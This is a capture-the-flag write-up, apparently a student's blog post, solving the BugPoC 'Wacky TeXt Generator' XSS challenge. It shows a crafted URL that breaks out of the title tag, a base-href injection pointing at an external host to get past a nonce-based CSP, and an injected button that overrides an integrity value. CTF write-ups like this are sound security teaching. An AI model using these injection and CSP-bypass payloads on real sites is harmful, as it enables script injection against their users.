BugPoC XSS CTF

The Wacky TeXt Generator

wacky.buggywebsite.com

Challenge

Setup

The wacky text generator loads the processed text as an iframe

Step 1: Title Escape

The param value is copied in the title, thus the title can be escaped
The endpoint checks whether the window name is “iframe”
window.name="iframe"
window.location = "https://wacky.buggywebsite.com/frame.html?param=1337%3c%2ftitle%3e%3C/head%3E%3ch1%3eHello%20Content%3ch1%3e

Step 2: Load Malicious Code

script-src ‘nonce-kvduhtgrdywi’ ‘strict-dynamic’; frame-src ‘self’; object-src ‘none’;
https://bugpoc.com/testers/other/redir
<base href="https://lg7tdq4rd5fc.redir.bugpoc.ninja/">

Step 3: Integrity Check

<button id="fileIntegrity" name="fileIntegrity" type="submit" value="zhPJ/x4SM8T7tGc4VA8FonTCCb8dogeYrmjRZYzCbaI="></button>

Step 4: Execute JavaScript

My final solution that I uploaded to BugPoC
My final XSS exploit code
The final exploit as BugPoC report (https://bugpoc.com/poc#bp-znA8d6ul PW: ARIdboBcaT88)

Summary

Computer Science Student. Interested in IT security and forensics. https://fhantke.de/